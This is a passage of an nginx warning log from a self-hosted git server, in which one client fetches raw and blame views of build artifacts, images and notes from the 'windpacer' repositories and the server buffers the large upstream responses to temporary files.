file /var/cache/nginx/proxy_temp/9/30/0000014309 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" -2026/02/17 14:56:11 [warn] 918#918: *56304 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/31/0000014310 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PYZ-00.pyz" -2026/02/17 14:56:24 [warn] 918#918: *56304 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/31/0000014311 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PYZ-00.pyz" -2026/02/17 14:56:48 [warn] 918#918: *56304 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/31/0000014312 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" -2026/02/17 14:56:57 [warn] 918#918: *56304 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/31/0000014313 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" -2026/02/17 14:57:15 [warn] 918#918: *56304 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/31/0000014314 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" -2026/02/17 14:57:23 [warn] 918#918: *56304 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/31/0000014315 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" -2026/02/17 14:57:55 [warn] 918#918: *56304 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/31/0000014316 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PYZ-00.pyz" -2026/02/17 14:58:01 [warn] 918#918: *56304 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/31/0000014317 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PYZ-00.pyz" -2026/02/17 14:59:05 [warn] 918#918: *56304 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/31/0000014318 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PYZ-00.pyz" -2026/02/17 14:59:42 [warn] 918#918: *56304 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/31/0000014319 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PYZ-00.pyz" -2026/02/17 14:59:51 [warn] 918#918: *56304 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/32/0000014320 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/base_library.zip", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/base_library.zip" -2026/02/17 15:00:02 [warn] 918#918: *56304 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/32/0000014321 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/base_library.zip", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/base_library.zip" -2026/02/17 15:01:39 [warn] 918#918: *56304 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/32/0000014322 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PYZ-00.pyz" -2026/02/17 15:02:37 [warn] 918#918: *56304 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/32/0000014323 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/base_library.zip", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/base_library.zip" -2026/02/17 15:03:06 [warn] 918#918: *56304 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/32/0000014324 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PYZ-00.pyz" -2026/02/17 15:04:36 [warn] 918#918: *57306 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/32/0000014325 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/base_library.zip", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/base_library.zip" -2026/02/17 15:05:14 [warn] 918#918: *57306 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/32/0000014326 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/base_library.zip", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/base_library.zip" -2026/02/17 15:06:14 [warn] 918#918: *57306 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/32/0000014327 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.html" -2026/02/17 15:06:28 [warn] 918#918: *57306 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/32/0000014328 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom3.png" -2026/02/17 15:06:35 [warn] 918#918: *57306 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/32/0000014329 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom1.png" -2026/02/17 15:06:42 [warn] 918#918: *57306 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/33/0000014330 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom6.png" -2026/02/17 15:06:48 [warn] 918#918: *57306 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/33/0000014331 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom5.png" -2026/02/17 15:06:56 [warn] 918#918: *57306 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/33/0000014332 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom2.png" -2026/02/17 15:07:02 [warn] 918#918: *57306 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/33/0000014333 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom4.png" -2026/02/17 15:07:15 [warn] 918#918: *57306 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/33/0000014334 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom2.png" -2026/02/17 15:07:44 [warn] 918#918: *57306 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/33/0000014335 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" -2026/02/17 15:07:49 [warn] 918#918: *57306 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/33/0000014336 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" -2026/02/17 15:07:55 [warn] 918#918: *57306 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/33/0000014337 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" -2026/02/17 15:14:52 [warn] 918#918: *58310 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/33/0000014338 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -2026/02/17 15:14:52 [warn] 918#918: *58310 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/33/0000014339 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -2026/02/17 15:20:00 [warn] 918#918: *58310 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/34/0000014340 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg" -2026/02/17 15:22:37 [warn] 918#918: *58310 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/34/0000014341 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/base_library.zip", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/base_library.zip" -2026/02/17 15:22:42 [warn] 918#918: *58310 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/34/0000014342 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/base_library.zip", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/base_library.zip" -2026/02/17 15:23:39 [warn] 921#921: *59312 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/34/0000014343 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol" -2026/02/17 15:23:49 [warn] 921#921: *59312 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/34/0000014344 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" -2026/02/17 15:23:50 [warn] 921#921: *59312 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/34/0000014345 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" -2026/02/17 15:24:50 [warn] 921#921: *59312 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/34/0000014346 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/base_library.zip", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/base_library.zip" -2026/02/17 15:32:52 [warn] 921#921: *60316 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/34/0000014347 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/base_library.zip", host: "git.hanmocnn.co.kr", referrer: 